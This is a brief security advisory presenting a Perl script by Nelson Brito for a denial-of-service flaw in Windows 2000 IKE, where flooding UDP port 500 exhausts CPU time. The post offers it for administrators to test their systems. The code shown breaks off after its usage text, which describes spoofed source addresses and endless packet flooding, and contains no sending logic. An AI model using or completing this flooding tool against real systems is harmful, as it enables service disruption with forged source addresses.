As we reported in our previous article: UDP DoS Attack on Windows 2000 IKE, a security vulnerability in the Windows 2000 operating systems allows remote attackers to consume large amount of CPU time by flooding the IKE port (UDP port 500). The following is an exploit code that can be used by administrators to test their system for the mentioned vulnerability.
Credit:
The information has been provided by Nelson Brito.
Exploit:
#!/usr/bin/perl -w
####################################################################
# Author : Nelson Brito
# E-mail : nelson@SEKURE.ORG
# File : nb-isakmp.pl
# Version : 0.3 Alpha
# Country : Brazil
# Date : 12/10/2001
####################################################################
use Socket;
use Net::RawIP;
use Getopt::Std;
($o{'s'}&&$o{'d'})||die
"\nUse: $0 [IP Options] [UDP Options]\n\n",
"IP Options:\n",
"\t\t-s*\tsource address to spoof\n",
"\t\t-d*\tdestination address to attack\n",
"\t\t-v\tIP Version\t\t\t\t(def: $v)\n",
"\t\t-t\tIP Type of Service (TOS)\t\t(def: $t)\n",
"\t\t-f\tIP fragementation offset\t\t(def: $f)\n",
"\t\t-T\tIP Time to Live (TTL)\t\t\t(def: $T)\n",
"UDP Options:\n",
"\t\t-p\tdestination port to attack\t\t(def: $p)\n",
"\t\t-l\tpacket length to send\t\t\t(def: $l)\n",
"\t\t-r\tset randon data\t\t\t\t(def: \".\")\n",
"Generic:\n",
"\t\t-n\tnumber of packets to send\t\t(def: $n)\n",
"\t\t-L\tsend packets forever\n\n",
"Copyright ? 2000 Nelson Brito <nelson\@SEKURE.ORG>.\n";
